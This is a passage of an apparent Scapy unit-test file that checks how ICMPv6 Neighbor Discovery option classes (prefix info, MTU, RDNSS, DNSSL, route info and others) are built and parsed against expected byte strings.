+a=IPv6(b'`\x00\x00\x00\x00\x18:\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x1f\xff\xfe\xcaFP\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x00UC\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1') +# Received NA +b=IPv6(b'n\x00\x00\x00\x00 :\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x1f\xff\xfe\xcaFP\x88\x00\xf3F\xe0\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1\x02\x01\x00\x0f4\x8a\x8a\xa1') +b.answers(a) + + +############ +############ ++ ICMPv6NDOptUnknown Class Test + += ICMPv6NDOptUnknown - Basic Instantiation +raw(ICMPv6NDOptUnknown()) == b'\x00\x02' + += ICMPv6NDOptUnknown - Instantiation with specific values +raw(ICMPv6NDOptUnknown(len=4, data="somestring")) == b'\x00\x04somestring' + += ICMPv6NDOptUnknown - Basic Dissection +a=ICMPv6NDOptUnknown(b'\x00\x02') +a.type == 0 and a.len == 2 + += ICMPv6NDOptUnknown - Dissection with specific values +a=ICMPv6NDOptUnknown(b'\x00\x04somerawing') +a.type == 0 and a.len==4 and a.data == b"so" and isinstance(a.payload, Raw) and a.payload.load == b"merawing" + + +############ +############ ++ ICMPv6NDOptSrcLLAddr Class Test + += ICMPv6NDOptSrcLLAddr - Basic Instantiation +raw(ICMPv6NDOptSrcLLAddr()) == b'\x01\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptSrcLLAddr - Instantiation with specific values +raw(ICMPv6NDOptSrcLLAddr(len=2, lladdr="11:11:11:11:11:11")) == b'\x01\x02\x11\x11\x11\x11\x11\x11' + += ICMPv6NDOptSrcLLAddr - Basic Dissection +a=ICMPv6NDOptSrcLLAddr(b'\x01\x01\x00\x00\x00\x00\x00\x00') +a.type == 1 and a.len == 1 and a.lladdr == "00:00:00:00:00:00" + += ICMPv6NDOptSrcLLAddr - Instantiation with specific values +a=ICMPv6NDOptSrcLLAddr(b'\x01\x02\x11\x11\x11\x11\x11\x11') +a.type == 1 and a.len == 2 and a.lladdr == "11:11:11:11:11:11" + + +############ +############ ++ ICMPv6NDOptDstLLAddr Class Test + += ICMPv6NDOptDstLLAddr - Basic Instantiation +raw(ICMPv6NDOptDstLLAddr()) == b'\x02\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptDstLLAddr - Instantiation with specific values +raw(ICMPv6NDOptDstLLAddr(len=2, lladdr="11:11:11:11:11:11")) == b'\x02\x02\x11\x11\x11\x11\x11\x11' + += ICMPv6NDOptDstLLAddr - Basic Dissection +a=ICMPv6NDOptDstLLAddr(b'\x02\x01\x00\x00\x00\x00\x00\x00') +a.type == 2 and a.len == 1 and a.lladdr == "00:00:00:00:00:00" + += ICMPv6NDOptDstLLAddr - Instantiation with specific values +a=ICMPv6NDOptDstLLAddr(b'\x02\x02\x11\x11\x11\x11\x11\x11') +a.type == 2 and a.len == 2 and a.lladdr == "11:11:11:11:11:11" + + +############ +############ ++ ICMPv6NDOptPrefixInfo Class Test + += ICMPv6NDOptPrefixInfo - Basic Instantiation +raw(ICMPv6NDOptPrefixInfo()) == b'\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptPrefixInfo - Instantiation with specific values +raw(ICMPv6NDOptPrefixInfo(len=5, prefixlen=64, L=0, A=0, R=1, res1=1, validlifetime=0x11111111, preferredlifetime=0x22222222, res2=0x33333333, prefix="2001:db8::1")) == b'\x03\x05@!\x11\x11\x11\x11""""3333 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += ICMPv6NDOptPrefixInfo - Basic Dissection +a=ICMPv6NDOptPrefixInfo(b'\x03\x04\x00\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 3 and a.len == 4 and a.prefixlen == 0 and a.L == 1 and a.A == 1 and a.R == 0 and a.res1 == 0 and a.validlifetime == 0xffffffff and a.preferredlifetime == 0xffffffff and a.res2 == 0 and a.prefix == "::" + += ICMPv6NDOptPrefixInfo - Instantiation with specific values +a=ICMPv6NDOptPrefixInfo(b'\x03\x05@!\x11\x11\x11\x11""""3333 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.type == 3 and a.len == 5 and a.prefixlen == 64 and a.L == 0 and a.A == 0 and a.R == 1 and a.res1 == 1 and a.validlifetime == 0x11111111 and a.preferredlifetime == 0x22222222 and a.res2 == 0x33333333 and a.prefix == "2001:db8::1" + + +############ +############ ++ ICMPv6NDOptRedirectedHdr Class Test + += ICMPv6NDOptRedirectedHdr - Basic Instantiation +~ ICMPv6NDOptRedirectedHdr +raw(ICMPv6NDOptRedirectedHdr()) == b'\x04\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptRedirectedHdr - Instantiation with specific values +~ ICMPv6NDOptRedirectedHdr +raw(ICMPv6NDOptRedirectedHdr(len=0xff, res="abcdef", pkt="somestringthatisnotanipv6packet")) == b'\x04\xffabcdefsomestringthatisnotanipv' + += ICMPv6NDOptRedirectedHdr - Instantiation with simple IPv6 packet (no upper layer) +~ ICMPv6NDOptRedirectedHdr +raw(ICMPv6NDOptRedirectedHdr(pkt=IPv6())) == b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += ICMPv6NDOptRedirectedHdr - Basic Dissection +~ ICMPv6NDOptRedirectedHdr +a=ICMPv6NDOptRedirectedHdr(b'\x04\x00\x00\x00') +assert(a.type == 4) +assert(a.len == 0) +assert(a.res == b"\x00\x00") +assert(a.pkt == b"") + += ICMPv6NDOptRedirectedHdr - Disssection with specific values +~ ICMPv6NDOptRedirectedHdr +a=ICMPv6NDOptRedirectedHdr(b'\x04\xff\x11\x11\x00\x00\x00\x00somerawingthatisnotanipv6pac') +a.type == 4 and a.len == 255 and a.res == b'\x11\x11\x00\x00\x00\x00' and isinstance(a.pkt, Raw) and a.pkt.load == b"somerawingthatisnotanipv6pac" + += ICMPv6NDOptRedirectedHdr - Dissection with cut IPv6 Header +~ ICMPv6NDOptRedirectedHdr +a=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 4 and a.len == 6 and a.res == b"\x00\x00\x00\x00\x00\x00" and isinstance(a.pkt, Raw) and a.pkt.load == b'`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptRedirectedHdr - Complete dissection +~ ICMPv6NDOptRedirectedHdr +x=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +y=x.copy() +del(y.len) +x == ICMPv6NDOptRedirectedHdr(raw(y)) + +# Add more tests + + +############ +############ ++ ICMPv6NDOptMTU Class Test + += ICMPv6NDOptMTU - Basic Instantiation +raw(ICMPv6NDOptMTU()) == b'\x05\x01\x00\x00\x00\x00\x05\x00' + += ICMPv6NDOptMTU - Instantiation with specific values +raw(ICMPv6NDOptMTU(len=2, res=0x1111, mtu=1500)) == b'\x05\x02\x11\x11\x00\x00\x05\xdc' + += ICMPv6NDOptMTU - Basic dissection +a=ICMPv6NDOptMTU(b'\x05\x01\x00\x00\x00\x00\x05\x00') +a.type == 5 and a.len == 1 and a.res == 0 and a.mtu == 1280 + += ICMPv6NDOptMTU - Dissection with specific values +a=ICMPv6NDOptMTU(b'\x05\x02\x11\x11\x00\x00\x05\xdc') +a.type == 5 and a.len == 2 and a.res == 0x1111 and a.mtu == 1500 + += ICMPv6NDOptMTU - Summary Output +ICMPv6NDOptMTU(b'\x05\x02\x11\x11\x00\x00\x05\xdc').mysummary() == "ICMPv6 Neighbor Discovery Option - MTU 1500" + + +############ +############ ++ ICMPv6NDOptShortcutLimit Class Test (RFC2491) + += ICMPv6NDOptShortcutLimit - Basic Instantiation +raw(ICMPv6NDOptShortcutLimit()) == b'\x06\x01(\x00\x00\x00\x00\x00' + += ICMPv6NDOptShortcutLimit - Instantiation with specific values +raw(ICMPv6NDOptShortcutLimit(len=2, shortcutlim=0x11, res1=0xee, res2=0xaaaaaaaa)) == b'\x06\x02\x11\xee\xaa\xaa\xaa\xaa' + += ICMPv6NDOptShortcutLimit - Basic Dissection +a=ICMPv6NDOptShortcutLimit(b'\x06\x01(\x00\x00\x00\x00\x00') +a.type == 6 and a.len == 1 and a.shortcutlim == 40 and a.res1 == 0 and a.res2 == 0 + += ICMPv6NDOptShortcutLimit - Dissection with specific values +a=ICMPv6NDOptShortcutLimit(b'\x06\x02\x11\xee\xaa\xaa\xaa\xaa') +a.len==2 and a.shortcutlim==0x11 and a.res1==0xee and a.res2==0xaaaaaaaa + + +############ +############ ++ ICMPv6NDOptAdvInterval Class Test + += ICMPv6NDOptAdvInterval - Basic Instantiation +raw(ICMPv6NDOptAdvInterval()) == b'\x07\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptAdvInterval - Instantiation with specific values +raw(ICMPv6NDOptAdvInterval(len=2, res=0x1111, advint=0xffffffff)) == b'\x07\x02\x11\x11\xff\xff\xff\xff' + += ICMPv6NDOptAdvInterval - Basic dissection +a=ICMPv6NDOptAdvInterval(b'\x07\x01\x00\x00\x00\x00\x00\x00') +a.type == 7 and a.len == 1 and a.res == 0 and a.advint == 0 + += ICMPv6NDOptAdvInterval - Dissection with specific values +a=ICMPv6NDOptAdvInterval(b'\x07\x02\x11\x11\xff\xff\xff\xff') +a.type == 7 and a.len == 2 and a.res == 0x1111 and a.advint == 0xffffffff + + +############ +############ ++ ICMPv6NDOptHAInfo Class Test + += ICMPv6NDOptHAInfo - Basic Instantiation +raw(ICMPv6NDOptHAInfo()) == b'\x08\x01\x00\x00\x00\x00\x00\x01' + += ICMPv6NDOptHAInfo - Instantiation with specific values +raw(ICMPv6NDOptHAInfo(len=2, res=0x1111, pref=0x2222, lifetime=0x3333)) == b'\x08\x02\x11\x11""33' + += ICMPv6NDOptHAInfo - Basic dissection +a=ICMPv6NDOptHAInfo(b'\x08\x01\x00\x00\x00\x00\x00\x01') +a.type == 8 and a.len == 1 and a.res == 0 and a.pref == 0 and a.lifetime == 1 + += ICMPv6NDOptHAInfo - Dissection with specific values +a=ICMPv6NDOptHAInfo(b'\x08\x02\x11\x11""33') +a.type == 8 and a.len == 2 and a.res == 0x1111 and a.pref == 0x2222 and a.lifetime == 0x3333 + + +############ +############ ++ ICMPv6NDOptSrcAddrList Class Test + += ICMPv6NDOptSrcAddrList - Basic Instantiation +raw(ICMPv6NDOptSrcAddrList()) == b'\t\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptSrcAddrList - Instantiation with specific values (auto len) +raw(ICMPv6NDOptSrcAddrList(res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\t\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptSrcAddrList - Instantiation with specific values +raw(ICMPv6NDOptSrcAddrList(len=3, res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptSrcAddrList - Basic Dissection +a=ICMPv6NDOptSrcAddrList(b'\t\x01\x00\x00\x00\x00\x00\x00') +a.type == 9 and a.len == 1 and a.res == b'\x00\x00\x00\x00\x00\x00' and not a.addrlist + += ICMPv6NDOptSrcAddrList - Dissection with specific values (auto len) +a=ICMPv6NDOptSrcAddrList(b'\t\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.type == 9 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" + += ICMPv6NDOptSrcAddrList - Dissection with specific values +conf.debug_dissector = False +a=ICMPv6NDOptSrcAddrList(b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +conf.debug_dissector = True +a.type == 9 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + + +############ +############ ++ ICMPv6NDOptTgtAddrList Class Test + += ICMPv6NDOptTgtAddrList - Basic Instantiation +raw(ICMPv6NDOptTgtAddrList()) == b'\n\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptTgtAddrList - Instantiation with specific values (auto len) +raw(ICMPv6NDOptTgtAddrList(res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\n\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptTgtAddrList - Instantiation with specific values +raw(ICMPv6NDOptTgtAddrList(len=3, res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptTgtAddrList - Basic Dissection +a=ICMPv6NDOptTgtAddrList(b'\n\x01\x00\x00\x00\x00\x00\x00') +a.type == 10 and a.len == 1 and a.res == b'\x00\x00\x00\x00\x00\x00' and not a.addrlist + += ICMPv6NDOptTgtAddrList - Dissection with specific values (auto len) +a=ICMPv6NDOptTgtAddrList(b'\n\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.type == 10 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" + += ICMPv6NDOptTgtAddrList - Instantiation with specific values +conf.debug_dissector = False +a=ICMPv6NDOptTgtAddrList(b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +conf.debug_dissector = True +a.type == 10 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + + +############ +############ ++ ICMPv6NDOptIPAddr Class Test (RFC 4068) + += ICMPv6NDOptIPAddr - Basic Instantiation +raw(ICMPv6NDOptIPAddr()) == b'\x11\x03\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptIPAddr - Instantiation with specific values +raw(ICMPv6NDOptIPAddr(len=5, optcode=0xff, plen=40, res=0xeeeeeeee, addr="ffff::1111")) == b'\x11\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptIPAddr - Basic Dissection +a=ICMPv6NDOptIPAddr(b'\x11\x03\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 17 and a.len == 3 and a.optcode == 1 and a.plen == 64 and a.res == 0 and a.addr == "::" + += ICMPv6NDOptIPAddr - Dissection with specific values +a=ICMPv6NDOptIPAddr(b'\x11\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.type == 17 and a.len == 5 and a.optcode == 0xff and a.plen == 40 and a.res == 0xeeeeeeee and a.addr == "ffff::1111" + + +############ +############ ++ ICMPv6NDOptNewRtrPrefix Class Test (RFC 4068) + += ICMPv6NDOptNewRtrPrefix - Basic Instantiation +raw(ICMPv6NDOptNewRtrPrefix()) == b'\x12\x03\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptNewRtrPrefix - Instantiation with specific values +raw(ICMPv6NDOptNewRtrPrefix(len=5, optcode=0xff, plen=40, res=0xeeeeeeee, prefix="ffff::1111")) == b'\x12\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptNewRtrPrefix - Basic Dissection +a=ICMPv6NDOptNewRtrPrefix(b'\x12\x03\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 18 and a.len == 3 and a.optcode == 0 and a.plen == 64 and a.res == 0 and a.prefix == "::" + += ICMPv6NDOptNewRtrPrefix - Dissection with specific values +a=ICMPv6NDOptNewRtrPrefix(b'\x12\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.type == 18 and a.len == 5 and a.optcode == 0xff and a.plen == 40 and a.res == 0xeeeeeeee and a.prefix == "ffff::1111" + + +############ +############ ++ ICMPv6NDOptLLA Class Test (RFC 4068) + += ICMPv6NDOptLLA - Basic Instantiation +raw(ICMPv6NDOptLLA()) == b'\x13\x01\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptLLA - Instantiation with specific values +raw(ICMPv6NDOptLLA(len=2, optcode=3, lla="ff:11:ff:11:ff:11")) == b'\x13\x02\x03\xff\x11\xff\x11\xff\x11' + += ICMPv6NDOptLLA - Basic Dissection +a=ICMPv6NDOptLLA(b'\x13\x01\x00\x00\x00\x00\x00\x00\x00') +a.type == 19 and a.len == 1 and a.optcode == 0 and a.lla == "00:00:00:00:00:00" + += ICMPv6NDOptLLA - Dissection with specific values +a=ICMPv6NDOptLLA(b'\x13\x02\x03\xff\x11\xff\x11\xff\x11') +a.type == 19 and a.len == 2 and a.optcode == 3 and a.lla == "ff:11:ff:11:ff:11" + + +############ +############ ++ ICMPv6NDOptRouteInfo Class Test + += ICMPv6NDOptRouteInfo - Basic Instantiation +raw(ICMPv6NDOptRouteInfo()) == b'\x18\x01\x00\x00\xff\xff\xff\xff' + += ICMPv6NDOptRouteInfo - Instantiation with forced prefix but no length +raw(ICMPv6NDOptRouteInfo(prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01' + += ICMPv6NDOptRouteInfo - Instantiation with forced length values (1/4) +raw(ICMPv6NDOptRouteInfo(len=1, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x01\x00\x00\xff\xff\xff\xff' + += ICMPv6NDOptRouteInfo - Instantiation with forced length values (2/4) +raw(ICMPv6NDOptRouteInfo(len=2, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x02\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01' + += ICMPv6NDOptRouteInfo - Instantiation with forced length values (3/4) +raw(ICMPv6NDOptRouteInfo(len=3, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01' + += ICMPv6NDOptRouteInfo - Instantiation with forced length values (4/4) +raw(ICMPv6NDOptRouteInfo(len=4, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x04\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptRouteInfo - Instantiation with specific values +raw(ICMPv6NDOptRouteInfo(len=6, plen=0x11, res1=1, prf=3, res2=1, rtlifetime=0x22222222, prefix="2001:db8::1")) == b'\x18\x06\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptRouteInfo - Basic dissection +a=ICMPv6NDOptRouteInfo(b'\x18\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 24 and a.len == 3 and a.plen == 0 and a.res1 == 0 and a.prf == 0 and a.res2 == 0 and a.rtlifetime == 0xffffffff and a. prefix == "::" + += ICMPv6NDOptRouteInfo - Dissection with specific values +a=ICMPv6NDOptRouteInfo(b'\x18\x04\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.plen == 0x11 and a.res1 == 1 and a.prf == 3 and a.res2 == 1 and a.rtlifetime == 0x22222222 and a.prefix == "2001:db8::1" + += ICMPv6NDOptRouteInfo - Summary Output +ICMPv6NDOptRouteInfo(b'\x18\x04\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01').mysummary() == "ICMPv6 Neighbor Discovery Option - Route Information Option 2001:db8::1/17 Preference Low" + + +############ +############ ++ ICMPv6NDOptMAP Class Test + += ICMPv6NDOptMAP - Basic Instantiation +raw(ICMPv6NDOptMAP()) == b'\x17\x03\x1f\x80\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptMAP - Instantiation with specific values +raw(ICMPv6NDOptMAP(len=5, dist=3, pref=10, R=0, res=1, validlifetime=0x11111111, addr="ffff::1111")) == b'\x17\x05:\x01\x11\x11\x11\x11\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' + += ICMPv6NDOptMAP - Basic Dissection +a=ICMPv6NDOptMAP(b'\x17\x03\x1f\x80\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type==23 and a.len==3 and a.dist==1 and a.pref==15 and a.R==1 and a.res==0 and a.validlifetime==0xffffffff and a.addr=="::" + += ICMPv6NDOptMAP - Dissection with specific values +a=ICMPv6NDOptMAP(b'\x17\x05:\x01\x11\x11\x11\x11\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') +a.type==23 and a.len==5 and a.dist==3 and a.pref==10 and a.R==0 and a.res==1 and a.validlifetime==0x11111111 and a.addr=="ffff::1111" + + +############ +############ ++ ICMPv6NDOptRDNSS Class Test + += ICMPv6NDOptRDNSS - Basic Instantiation +raw(ICMPv6NDOptRDNSS()) == b'\x19\x01\x00\x00\xff\xff\xff\xff' + += ICMPv6NDOptRDNSS - Basic instantiation with 1 DNS address +raw(ICMPv6NDOptRDNSS(dns=["2001:db8::1"])) == b'\x19\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += ICMPv6NDOptRDNSS - Basic instantiation with 2 DNS addresses +raw(ICMPv6NDOptRDNSS(dns=["2001:db8::1", "2001:db8::2"])) == b'\x19\x05\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += ICMPv6NDOptRDNSS - Instantiation with specific values +raw(ICMPv6NDOptRDNSS(len=43, res=0xaaee, lifetime=0x11111111, dns=["2001:db8::2"])) == b'\x19+\xaa\xee\x11\x11\x11\x11 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += ICMPv6NDOptRDNSS - Basic Dissection +a=ICMPv6NDOptRDNSS(b'\x19\x01\x00\x00\xff\xff\xff\xff') +a.type==25 and a.len==1 and a.res == 0 and a.dns==[] + += ICMPv6NDOptRDNSS - Dissection (with 1 DNS address) +a=ICMPv6NDOptRDNSS(b'\x19\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.type==25 and a.len==3 and a.res ==0 and len(a.dns) == 1 and a.dns[0] == "2001:db8::1" + += ICMPv6NDOptRDNSS - Dissection (with 2 DNS addresses) +a=ICMPv6NDOptRDNSS(b'\x19\x05\xaa\xee\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.type==25 and a.len==5 and a.res == 0xaaee and len(a.dns) == 2 and a.dns[0] == "2001:db8::1" and a.dns[1] == "2001:db8::2" + += ICMPv6NDOptRDNSS - Summary Output +a=ICMPv6NDOptRDNSS(b'\x19\x05\xaa\xee\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.mysummary() == "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option 2001:db8::1, 2001:db8::2" + + +############ +############ ++ ICMPv6NDOptDNSSL Class Test + += ICMPv6NDOptDNSSL - Basic Instantiation +raw(ICMPv6NDOptDNSSL()) == b'\x1f\x01\x00\x00\xff\xff\xff\xff' + += ICMPv6NDOptDNSSL - Instantiation with 1 search domain, as seen in the wild +raw(ICMPv6NDOptDNSSL(lifetime=60, searchlist=["home."])) == b'\x1f\x02\x00\x00\x00\x00\x00<\x04home\x00\x00\x00' + += ICMPv6NDOptDNSSL - Basic instantiation with 2 search domains +raw(ICMPv6NDOptDNSSL(searchlist=["home.", "office."])) == b'\x1f\x03\x00\x00\xff\xff\xff\xff\x04home\x00\x06office\x00\x00\x00' + += ICMPv6NDOptDNSSL - Basic instantiation with 3 search domains +raw(ICMPv6NDOptDNSSL(searchlist=["home.", "office.", "here.there."])) == b'\x1f\x05\x00\x00\xff\xff\xff\xff\x04home\x00\x06office\x00\x04here\x05there\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptDNSSL - Basic Dissection +p = ICMPv6NDOptDNSSL(b'\x1f\x01\x00\x00\xff\xff\xff\xff') +p.type == 31 and p.len == 1 and p.res == 0 and p.searchlist == [] + += ICMPv6NDOptDNSSL - Basic Dissection with specific values +p = ICMPv6NDOptDNSSL(b'\x1f\x02\x00\x00\x00\x00\x00<\x04home\x00\x00\x00') +p.type == 31 and p.len == 2 and p.res == 0 and p.lifetime == 60 and p.searchlist == ["home."] + += ICMPv6NDOptDNSSL - Summary Output +ICMPv6NDOptDNSSL(searchlist=["home.", "office."]).mysummary() == "ICMPv6 Neighbor Discovery Option - DNS Search List Option home., office." + + +############ +############ ++ ICMPv6NDOptEFA Class Test + += ICMPv6NDOptEFA - Basic Instantiation +raw(ICMPv6NDOptEFA()) == b'\x1a\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NDOptEFA - Basic Dissection +a=ICMPv6NDOptEFA(b'\x1a\x01\x00\x00\x00\x00\x00\x00') +a.type==26 and a.len==1 and a.res == 0 + + +############ +############ ++ Test Node Information Query - ICMPv6NIQueryNOOP + += ICMPv6NIQueryNOOP - Basic Instantiation +raw(ICMPv6NIQueryNOOP(nonce=b"\x00"*8)) == b'\x8b\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NIQueryNOOP - Basic Dissection +a = ICMPv6NIQueryNOOP(b'\x8b\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 139 and a.code 